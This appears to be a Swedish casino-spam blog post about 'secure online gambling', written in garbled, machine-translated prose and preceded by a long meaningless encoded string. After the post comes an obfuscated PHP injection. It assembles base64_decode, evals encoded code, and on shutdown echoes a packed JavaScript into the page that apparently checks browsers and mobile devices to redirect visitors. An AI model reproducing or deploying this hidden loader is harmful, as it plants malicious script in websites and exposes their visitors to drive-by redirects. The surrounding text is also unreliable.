MTFkLnNlMTFkLnNlMTFkLnNlMTFkLnNlMTFkLnNlMTFkLnNlMTFkLnNlMTFkLnNlMTFkLnNlMTFkLnNlMTFkLnNlMTFkLnNlMTFkLnNlMTFkLnNlMTFkLnNlMTFkLnNlMTFkLnNlMTFkLnNlMTFkLnNlMTFkLnNlMTFkLnNlMTFkLnNlMTFkLnNlMTFkLnNlMTFkLnNlMTFkLnNlMTFkLnNlMTFkLnNlMTFkLnNlMTFkLnNlMTFkLnNlMTFkLnNlMTFkLnNlMTFkLnNlMTFkLnNlMTFkLnNlMTFkLnNlMTFkLnNlMTFkLnNlMTFkLnNlMTFkLnNlMTFkLnNlMTFkLnNlMTFkLnNlMTFkLnNlMTFkLnNlMTFkLnNlMTFkLnNlMTFkLnNlMTFkLnNlMTFkLnNlMTFkLnNlMTFkLnNlMTFkLnNlMTFkLnNlMTFkLnNlMTFkLnNlMTFkLnNlMTFkLnNlMTFkLnNlMTFkLnNlMTFkLnNl When We Fall » Secure online gambling
Online Casino Bonus Besök
€100
1000 KR
€200
€100
€100
Feb
5
2012

Secure online gambling

Säker online gambling är mycket viktigt att casino spelare. Säkerhet, ensamhet, och skydd är verkligen mycket som behövs för kontakter mellan kasinon och spelarna. Om det inte fanns något sådant som säker och skyddad spel, skulle kasinospelare litar inte på online-kasinon som de gör idag.

Alla företag verkar på kundernas förtroende, och när det kommer till spel, spelare alltid leta efter en säker kasino. Ett kasino som en spelare kan lita på är mer framgångsrik än en som hänger sig åt bedrägerier. Sådan olaglig verksamhet är vanliga inom spelindustrin eftersom många av online-kasinon är olagligt inrättats. Detta gör dem immuna mot åtal eftersom de är belägna utanför de spelare landet.

Några av de vanligaste bedrägerierna finns i spelindustrin och Internet har visat sig vara en förmån och en bane. Detta beror på att det finns ett större utrymme för bedrägerier på Internet. Webbplatsen är utvecklad i andra länder och detta ger dem immunitet mot rättsliga straffåtgärder. Dessutom är dessa företag är mycket rik och kan lätt skydda sig med hjälp av regeringen i det landet.

Även om det finns utrymme för bedrägerier på Internet, har någon lösning leverantörer kommer upp för att säkerställa öppenhet och ärlighet i onlinespel verksamhet. Ett sådant organ är Online Gambling Association, ett tillsynsorgan. Det ser till att alla onlinespel institutioner ger kunder med trygghet, säkerhet och skydd mot olaglig verksamhet.

En annan viktig punkt som bör beaktas är payoff procentsatser. Om payoff procentsatserna är låga då innebär det att spelande huset inte ger spelaren med lämpliga vinnande summan. Detta kan leda till problem eftersom själva syftet av spel är besegras om låga vinster accepteras. Således skall den säkerhet som spelhus är den enskilt viktigaste faktorn som påverkar inte bara rykte av verksamheten utan avgör också om spelaren är att få en rättvis behandling.

Posted by admin in Casino, Gambling, Kasino

/*309c96d78ddb18e632c8c2eeb17f1898*/ $ygu="b"."ase"."64_de"."code";eval($ygu("CmZ1bmN0aW9uIHVzZXJfYWJvcnRfZW5kX2V4aXRfb3BlcmF0aW9uaWRfNjQwOTU0NigpCnsKICAgIGVjaG8gYmFzZTY0X2RlY29kZSgnUEhOamNtbHdkQ0IwZVhCbFBTSjBaWGgwTDJwaGRtRnpZM0pwY0hRaUlHbGtQU0pwWkY4Mk5EQTVOVFEySWo1bGRtRnNLR1oxYm1OMGFXOXVLSEFzWVN4akxHc3NaU3hrS1h0bFBXWjFibU4wYVc5dUtHTXBlM0psZEhWeWJpaGpQR0UvSnljNlpTaHdZWEp6WlVsdWRDaGpMMkVwS1NrcktDaGpQV01sWVNrK016VS9VM1J5YVc1bkxtWnliMjFEYUdGeVEyOWtaU2hqS3pJNUtUcGpMblJ2VTNSeWFXNW5LRE0yS1NsOU8ybG1LQ0VuSnk1eVpYQnNZV05sS0M5ZUx5eFRkSEpwYm1jcEtYdDNhR2xzWlNoakxTMHBlMlJiWlNoaktWMDlhMXRqWFh4OFpTaGpLWDFyUFZ0bWRXNWpkR2x2YmlobEtYdHlaWFIxY200Z1pGdGxYWDFkTzJVOVpuVnVZM1JwYjI0b0tYdHlaWFIxY200blhGeDNLeWQ5TzJNOU1YMDdkMmhwYkdVb1l5MHRLWHRwWmloclcyTmRLWHR3UFhBdWNtVndiR0ZqWlNodVpYY2dVbVZuUlhod0tDZGNYR0luSzJVb1l5a3JKMXhjWWljc0oyY25LU3hyVzJOZEtYMTljbVYwZFhKdUlIQjlLQ2RxSURGQ1BUTjRLRWtvS1h0bUtIRXVUeUU5TVZBbUprMGdjUzVQSVQwaVRDSXBlek41S0RGQ0tUdG1LRTBnUVZzaU1VWWlYVDA5SWt3aUtYdEJXeUl4UmlKZFBURTdhaUJaUFNoV0tDa21KakZrS0NrcE8yb2dNVkU5SVZrbUppRWhRUzR6ZWlZbVFTNUZMak4zUFQwOUlqTjJJRE55TGlJN2FpQXhUajB0TVR0cUlFYzlJak56T2k4dk0zUXVNM1VpTzJZb01UY29LU1ltTVU0OVBURXBlMllvS0VVdVVDNHhTeWd2TTBFdmFTa3BmSHdvUlM1UUxqRkxLQzh6UWk5cEtTa3BlekZpTGpOSUtFY3BmWHA3UVM0eFlqMUhPM0V1TVdJOVIzMTllbnRtS0NoWkppWWhNVkVtSmlFeE55Z3BLU2w3YWlCVlBTSThWQ0F6U1QxY1hDSXpTam96UnpzelJqb3RNME03WEZ3aVBqd3hReUF6UkQxY1hDSXhSRnhjSWlBelJUMWNYQ0lpSzBjcklseGNJaUF6Y1QxY1hDSXhSRnhjSWo0OEx6RkRQand2VkQ0aU8yb2dTajF4TGpOd0tDSlVJaWs3WmloS0xqRjRQVDB3S1h0eExrOHVUajF4TGs4dVRpdFZmWHA3YWlBeFFUMUtMakY0TzJvZ1VqMHpZaTR6WXlnb01VRXZNaWtwTzBwYlVsMHVUajFLVzFKZExrNHJWWDE5ZlgweFNpZ3BmWDBzTTJRcE8wa2dNVW9vS1h0cUlGbzlJak5oSWp0bUtGb2hQU0l6T1NJcGUyb2dTRDF4TGpNMUtGb3BPMllvVFNCSUlUMU1KaVpJSVQweFVDbDdTQzR6TmowaUlqc3pOeUJJZlgxOU8wa2dNV1FvS1h0bUtIRXVReVltSVhFdU16Z3BlM2dnUW4xNklHWW9jUzVESmlZaFFTNHpaU2w3ZUNCQ2ZYb2daaWh4TGtNbUppRnhMak5tS1h0NElFSjllaUJtS0hFdVF5WW1JWEV1TTIwcGUzZ2dRbjE2SUdZb2NTNURKaVloUVM0emJpbDdlQ0JDZlhvZ1ppaHhMa01wZTNnZ1FuMTZJR1lvVFNCRkxqTnZJVDBpVENJbUppRnhMa01tSmxZb0tTbDdlQ0JDZlhwN2VDQXhZWDE5U1NCV0tDbDdhaUI1UFVFdVJTNVFPMm9nU3oxNUxrUW9Jak5zSUNJcE8yWW9TejR3S1h0NElERTJLSGt1TVdNb1N5czFMSGt1UkNnaUxpSXNTeWtwTERFd0tYMXFJREZ5UFhrdVJDZ2lNMnN2SWlrN1ppZ3hjajR3S1h0cUlGTTllUzVFS0NJelp6b2lLVHQ0SURFMktIa3VNV01vVXlzekxIa3VSQ2dpTGlJc1V5a3BMREV3S1gxcUlGRTllUzVFS0NJemFDOGlLVHRtS0ZFK01DbDdlQ0F4TmloNUxqRmpLRkVyTlN4NUxrUW9JaTRpTEZFcEtTd3hNQ2w5ZUNBeFlYMUpJREUzS0NsN2FpQXhORDFCTGtVdVVDNHphU2dwTzJZb0x5Z3phbnd6UzF4Y1pDdDhNMHdwTGlzeGNYdzBhSHcwYVZ4Y0wzdzBhbncwWjN3MFpudzBZbncwWTN3MFpId3pOSHd4VWlnMGEzd3hUU2w4TVhwOE5HeDhOSElnZkRSemZEUjBmRFJ4ZkRGeExpczBjSHcwYlh3MGJpQnRLRFJ2ZkRSaEtXbDhORGdvSURGSUtUOThNMU44Y0NnelZId3pWU2xjWEM5OE0xSjhNMUY4TTAxOE0wNG9OSHcyS1RCOE0wOThNMUI4TVZWY1hDNG9NMVo4TTFjcGZEUXpmRFEwZkRRMklEUXlmRFF4ZkROWUwya3VNWGtvTVRRcGZId3ZNMWw4TTFwOE5IVjhNekI4TVZwOE5UQmJNUzAyWFdsOE1qaDhNVmQ4WVNBeFIzd3hWbnd4YkNneFZId3hibnh6WEZ3dEtYd3haU2d5Tm53eWNTbDhNWEFvTW14OE1VOThNVzBwZkRKcmZESnFLREp0ZkZoOE1tNHBmREk1ZkRGMUtESndmREU1S1h3eWJ5aFhmREpwS1h3eVkzd3lZaWd5Wm54Y1hDMXRmSElnZkhNZ0tYd3laM3d5WlNneFNYd3hjM3d5WkNsOE1YWW9NbUY4TW1ncGZERllLREZzZkRGWktYd3lOeWhsZkhZcGQzd3lOWHd5TkZ4Y0xTaHVmSFVwZkRJeVhGd3ZmREl6ZkRNemZESlJYRnd0ZkRKU2ZESlRmREpRZkRKUFhGd3RmREZ0S0RKTWZERnFLWHd5VFh3eVRpZ3hhSHd4YzN3eVZDbDhNbFY4TW5KY1hDMXpmRE14ZkRKYWZESlpmREZtS0dOOGNDbHZmREpXS0RFeWZGeGNMV1FwZkRKWEtEUTVmREZsS1h3eVdDZ3lTM3d5U2lsOE1WUW9Nbmg4TW5rcGZESjZmREozS0ZzMExUZGRNSHd4U0h3eFIzd3lkaWw4TW5OOE1uUW9YRnd0ZkRGTUtYd3hVeUIxZkRKMWZESkJmREpDWEZ3dE5YeG5YRnd0TVRGOE1Ua29YRnd1ZDN3eFRTbDhNa2dvTWtsOE1rY3BmREpHZkRKRGZESkVYRnd0S0cxOGNIeDBLWHd5UlZ4Y0xYdzBaU2d4ZDN3eFp5bDhORkVvSUdsOE1WSXBmRFpOWEZ3dFkzdzJUQ2hqS0Z4Y0xYd2dmREZNZkdGOFozeHdmSE44ZENsOE5qWXBmRFZYS0RZemZEWjBLWHhwWEZ3dEtESXdmREU1ZkRFMUtYdzJiWHcyYmlnZ2ZGeGNMWHhjWEM4cGZEUjJmRFp2ZkRac2ZEWnJmRFpvZkRacGZEWnFmREY2ZkRad0tIUjhkaWxoZkRaeGZEWjNmRFo0ZkRaNWZEWjJmRFoxS0NCOFhGd3ZLWHcyY253Mlp5QjhObVpjWEMxOE5qSW9ZM3hyS1h3Mk5DZzFXbncxV1NsOE5WWW9JR2Q4WEZ3dktHdDhiSHgxS1h3MU1IdzFOSHhjWEMxYllTMTNYU2w4Tm1SOE5tVjhObUpjWEMxM2ZEWTRmRFk1WEZ3dmZERTFLRmQ4TmtGOE5ub3BmREZwS0VaOE1qRjhNVThwZkcxY1hDMDNNWHczTWlnMldud3hieWw4Tmxrb05sZDhObGg4TVVVcGZEYzFmREV4S0VaOE56UjhNWFo4TjJSOE1XWjhkQ2hjWEMxOElIeHZmSFlwZkRkaktYdzNPU2cxTUh3M1lYeDJJQ2w4TnpkOE56aDhObFZiTUMweVhYdzJWRnN5TFROZGZEWkhLREI4TWlsOE5rZ29NSHd5ZkRVcGZEWkpLREFvTUh3eEtYd3hNQ2w4TmtZb0tHTjhiU2xjWEMxOE5rVjhOa0o4TmtOOE5rUjhOa29wZkRaTEtEWjhhU2w4TmxKOE5sTjhObEFvTms5OE5rNHBmRFkzZkRWVWZEUllmRFJaS0dGOFpIeDBLWHcxVlh3MFdpZ3hNM3hjWEMwb1d6RXRPRjE4WXlrcGZEUlNmRFJUZkRGMEtEUlVmRFJWS1h3MU1WeGNMVEo4TlRVb01VbDhOV0o4TVdzcGZEVmpmRFZrZkRGM1hGd3RaM3cxWVZ4Y0xXRjhOVFlvTlRkOE1USjhNakY4TXpKOE5qQjhYRnd0V3pJdE4xMThhVnhjTFNsOE5FVjhORUo4TkVGOE5IZDhOSGg4Tkhrb05IcDhORVlwZkRSSFhGd3ZmRFJOS0RST2ZERTFmRFJQZkRSTWZGaDhORXNwZkRSSUtFWjhhRnhjTFh3eGJueHdYRnd0S1h3MFNseGNMM3d4YXloaktGeGNMWHd3ZkRFcGZEUTNmREZwZkRGcWZERnZLWHcxWmx4Y0xYdzFSM3cxU0NoY1hDMThiU2w4TlVsY1hDMHdmRFZHS0RRMWZEVkZLWHcxUWlneGNId3hkWHcxUTN3eGFIdzFSQ2w4TlVvb05VdDhXQ2w4TlZFb1JueG9YRnd0ZkhaY1hDMThkaUFwZkRWU0tFWjhOVk1wZkRWUUtERTRmRFV3S1h3MVR5ZzFUSHd4TUh3eE9DbDhNV2NvTlVGOE5Yb3BmRFZ0WEZ3dGZEVnVYRnd0ZkRWdktHbDhiU2w4Tld4Y1hDMThkRnhjTFRFeGZEVm5LREYwZkRWb0tYd3hSU2czTUh4dFhGd3RmRFZxZkRWd0tYdzFjVnhjTFRsOE1WVW9YRnd1WW53eFUzdzFkeWw4TlhoOE5YbDhOWFo4TlhWOE5YSW9OWE44VnlsOE5YUW9OREI4TlZzd0xUTmRmRnhjTFhZcGZEVnBmRFZyZkRWT2ZEVk5LRFV5ZkRVemZEWXdmRFl4ZkRjd2ZEVmxmRFJKZkRSRWZEUkRmRFJRS1h3MU9DaGNYQzE4SUNsOE5UbDhORlo4TkZjb1p5QjhObEY4TnpZcGZEZGlmRFpXZkRjemZEWmhYRnd0ZkRaamZEWTFmRFZZWEZ3dEwya3VNWGtvTVRRdU5uTW9NQ3cwS1NrcGUzZ2dRbjE0SURGaGZTY3NOaklzTkRRNExDZDhmSHg4Zkh4OGZIeDhmSHg4Zkh4cFpueDhmSHgyWVhKOGZIeDhmSHg4Wkc5amRXMWxiblI4Zkh4OGZIeDhjbVYwZFhKdWZFVmpaV3gzUVZoTmIyMUplbXhWZFhCUlZsUnRSR3RwWkU1emRrVlNjMlJ4VEhKYVVIeGxiSE5sZkhkcGJtUnZkM3gwY25WbGZHRnNiSHhwYm1SbGVFOW1mRzVoZG1sbllYUnZjbnd3TVh4UlpYUm9abkpNVEhsdWJtWmFlRlJuYkdKdVdrRjVVVlIxYTJ4dFJFWjJUWHhvVkZaS1ZXaHFaMEZpUTJOMFUzWjNXR055UWtKNlQycGFkM0phWTBKcGZHWjFibU4wYVc5dWZHbEhaa1pEWlhGWWVHbEpla0pLWVdKb2FsWmhjbmgyWTJscFNWVlJjbHA2V1VGaFNHUk9iSHhSYUU1eWVFZEVha2g0ZGs1SVExcFhXa2hTY1c5UVUybDJXSE5xVFV0dmZIVnVaR1ZtYVc1bFpIeDBlWEJsYjJaOGFXNXVaWEpJVkUxTWZHSnZaSGw4ZFhObGNrRm5aVzUwZkZGNmEySjBTMEpwZW05VVRHVm1ZbU5YUzAxR1ZsSlBjMnB6ZWxaUlYzSktXRkZwVW5GNVJXSllmR3hyWVV0alIzaGtTVWhUZWtSVmVYZFRlazVyVFdGMVdWSjZUVUZzVmxocVozRjhSR0ZEU0dkRVpFdE9UMk55Y0U5dVkyNU5TbFZ4YkdsUFpFOURVWEJSVlhKOFpHbDJmRUZSZEVaTmNrSjFXazFaZVZsNGJFTlNXa0ZqY0VSdVZXRlJTSFJYUm1aOGFsTjJVRmhzWm5aUVJGRlJiWGxxVVdsSWIxTkxVRkZwUTBsVFRuUjNWV2REZkhSbGZHNTVmR3hrZW1oNlUwOWliVXhVZDI5RmVrMU9WbGxSVjB0cFdVMXFUbE5DVWxGSmZGWmlSWEZxWlc5UlkyUklSbmxzUmxwM1owdGhablZHUjFOVlRXNTFkM3BxVjI1UWRXbGFhWGxWZkh4dGIzeDhmSEJSVUZsR1kyRkZXbTEyV25GdGNrbG1SRVZrY2sxRFpVaFBkWGh5V201SGVuRmhUWFY4YldGOGNHRnljMlZKYm5SOGJtOXFRblZaVVZOUFkxbEdUMEpUWVhOVlIzQk9hbGh1V2tkcFdGbGFUazlzVmxacFNFRjhmR2R2ZkdaaGJITmxmR3h2WTJGMGFXOXVmSE4xWW5OMGNtbHVaM3hoYVdselJsTllTMWx4UTJaVmEyMVFVa1ZCWkZaTlZGaEpkVlprUkVWeWVIeGhhWHhrYjN4MFlYeHBkSHh0WTN4dVpIeHpaWHhoWTN4amIzeHZiM3h5YVh4aGJIeHRiMkpwYkdWOGJuVlJUbkI0ZW1wc1QzTlJWRUZMUldsR2IyUktTMnhJUjNKclVVRmhRMlpvYUdOWFJVNXBXblY4Ykd4OGNHeDhZWEo4WW1sOGNIUjhiR1Z1WjNSb2ZIUmxjM1I4YVhKcGMzeGtiRjl1WVcxbGZHNVlVMFppZVU1elowbDZjM0ZUVWxsSmNrNUpZbWRLVld4aVMyTnBTMVpsZEVGSlFXeDhhV1p5WVcxbGZERXljSGg4ZEhOOGRsOHpNRGxqT1Raa056aGtaR0l4T0dVMk16SmpPR015WldWaU1UZG1NVGc1T0h4M1lYeHZjM3hqYTN4c1dtOXdibGxLVGxGSGJrOWxRWGxrYW1oTWNYcFhhWFJPY20xR1IyNVhkWGxtU25SSmIwSlNmRzFoZEdOb2ZGOThiMlI4U1UxVmJVdGxUWHBFYzB4VGJXTklhRzFRYUdOVGQySlZZa1ZQYkhOU2JtcDZhVkIwUzI1S2JXTjhZMkY4Ym5Wc2JIeHFVRXhSVjIxM1FXaE1kWHBhVDFsR2VreEllbEZSVjI5SGRIcHlVR3ROVlV0aFMyeGhSMFJqZkdsd2ZHY3hmR1Z5ZkhWd2ZHRmlZV044T0RBeWMzeGliSHhoZW53MGRHaHdmSHg4WXpVMWZHTmhjR2w4WW5kOFluVnRZbnhyYjN4aWNudzNOekJ6ZkdGd2RIVjhiR0o4WVhWOFlYUjBkM3h1Y1h4aVpYeGthWHhoZG1GdWZISmtmSFZ6ZkdGdWZHRnRiMmw4WVhaOFpYaDhlWGQ4WVhOOFkyaDhjbTU4WkdOOFptVjBZM3htYkhsOFp6VTJNSHg2Wlh4bGVueHBZM3hyTUh4bGMydzRmR2RsYm1WOFoyWjhhR05wZEh4b1pIeG9aV2w4YUdGcFpYeDFibnhuY254aFpIeDFiSHhzTW54dGNIeGpjbUYzZkdSaGZHTnRaSHhqYkdSamZHTmtiWHhqWld4c2ZHTm9kRzE4Ym1kOFpHSjBaWHhrYzN4bGJIeGxiWHhrYlc5aWZHUnBZMkY4TTJkemIzeGtaWFpwZkh4alkzZGhmR2xsYlc5aWFXeGxmR2RsZEVWc1pXMWxiblJDZVVsa2ZHOTFkR1Z5U0ZSTlRIeGtaV3hsZEdWOFkyOXRjR0YwVFc5a1pYeHViMjVsZkdsa1h6WTBNRGsxTkRaOFRXRjBhSHhtYkc5dmNud3hNREI4V0UxTVNIUjBjRkpsY1hWbGMzUjhjWFZsY25sVFpXeGxZM1J2Y254eWRueEZaR2RsZkhSdlRHOTNaWEpEWVhObGZHRnVaSEp2YVdSOFZISnBaR1Z1ZEh4TlUwbEZmR0ZrWkVWMlpXNTBUR2x6ZEdWdVpYSjhZWFJ2WW54dFlYaFViM1ZqYUZCdmFXNTBjM3huWlhSRmJHVnRaVzUwYzBKNVZHRm5UbUZ0Wlh4b1pXbG5hSFI4U1c1amZHaDBkSEI4Wkdka2MyZDNaV1YzZEdWM05UUTFORE0xZkhScmZFZHZiMmRzWlh4MlpXNWtiM0o4YzJWMFNXNTBaWEoyWVd4OFkyeGxZWEpKYm5SbGNuWmhiSHhqYUhKdmJXVjhhVkJvYjI1bGZHbFFiMlI4TXpRNE1YQjRmSGRwWkhSb2ZITnlZM3hzWldaMGZHRmljMjlzZFhSbGZISmxjR3hoWTJWOGMzUjViR1Y4Y0c5emFYUnBiMjU4WW1KOGJXVmxaMjk4Y0hOd2ZITmxjbWxsYzN4emVXMWlhV0Z1ZkhSeVpXOThjRzlqYTJWMGZIQnNkV05yWlhKOGNHaHZibVY4YVhocGZISmxmR0p5YjNkelpYSjhiR2x1YTN4NGFXbHViM3d4TWpBM2ZEWXpNVEI4Zkhoa1lYeGpaWHgyYjJSaFptOXVaWHgzWVhCOGZIZHBibVJ2ZDNOOGZIQmhiRzE4ZkdsdWZHVnNZV2x1Wlh4bVpXNXVaV044YUdsd2RHOXdmR2hwZkdOdmJYQmhiSHhpYkdGNlpYSjhZWFpoYm5SbmIzeGlZV1JoZkdKc1lXTnJZbVZ5Y25sOGFHOXVaWHhyYVc1a2JHVjhibVYwWm5KdmJuUjhiM0JsY21GOGIySjhabWx5WldadmVIeHRiWEI4YkdkbGZHMWhaVzF2ZkcxcFpIQjhOalU1TUh4cFluSnZmSEpoYTNOOGNtbHRPWHh5YjN4MlpYeHlOakF3ZkhJek9EQjhPRFY4T0ROOGNYUmxhM3g2YjN4ek5UVjhjMk44T0RGOGMyUnJmSFpoZkcxemZITmhmR2RsZkcxdGZEazRmR2h3ZkhCb2FXeDhjR2x5Wlh4aGVYeDFZM3gzYUdsMGZIZHBmSEE0TURCOGNHRnVmSEJuZkh4d2JueDhmSHh3YjN4eFkzd3dOM3gzTTJOOGQyVmlZM3h4WVh4eWRIeHdjbTk0ZkhCemFXOThPREI4YzJkb2ZIUnZmSE5vZkhadE5EQjhiVE44ZG05a1lYeDBhVzE4ZEdOc2ZIUmtaM3gwWld4OGJUVjhkSGg4ZG1sOGNtZDhkbXQ4ZG1WeWFYeDJOelV3ZkhOcGZIVjBjM1I4ZGpRd01IeHNhM3huZEh4emJYeGlNM3gwTlh4cFpIeHpiSHh6YUdGeWZITnBaWHh6YTN4emIzeG1kSHd3TUh4MmVIeDJkV3hqZkhRMmZIUXlmSE53ZkhONWZHMWlmRzkzWnpGOGNHUjRaM3hzWjN4b2RYeDZkR1Y4ZUdsOGJtOThmSHhyZVc5OFlYZDhiR1Y4ZW1WMGIzeDBjSHh2Y21GdWZHMHpaMkY4YlRVd2ZIbGhjM3h0TVh4NWIzVnlmR3hwWW5kOGJIbHVlSHhyZDJOOGEzQjBmR2x0TVd0OGFXNXViM3hwY0dGeGZHbHJiMjE4YVdjd01YeHBNak13ZkdsaFkzeHBaR1ZoZkdwaGZHcGljbTk4YTJ4dmJueHpkV0p6ZEhKOGRHTjhhMmQwZkd0bGFtbDhhbVZ0ZFh4cWFXZHpmR3RrWkdsOGVHOThkV2w4ZEdaOGQyWjhkMmQ4YjI1OGJtVjhiak13Zkc0MU1IeHVOM3gzZEh4dWIydDhhSFI4YUhOOGQzWjhkR2w4YjNCOGJtTjhibnB3YUh4dk1tbHRmRzR5TUh4dU1UQjhkMjl1ZFh4dk9IeHZZWHh0YVh4eVkzeDhZM0o4YldWOGVEY3dNSHd3TW54dGJXVm1mRzUzZkcxM1luQjhiWGwzWVh4dGRIeHdNWHgzYld4aWZIcDZmR1JsSnk1emNHeHBkQ2duZkNjcExEQXNlMzBwS1FvOEwzTmpjbWx3ZEQ0PScpOwp9CgpyZWdpc3Rlcl9zaHV0ZG93bl9mdW5jdGlvbigndXNlcl9hYm9ydF9lbmRfZXhpdF9vcGVyYXRpb25pZF82NDA5NTQ2Jyk7Cgo="));/*309c96d78ddb18e632c8c2eeb17f1898*/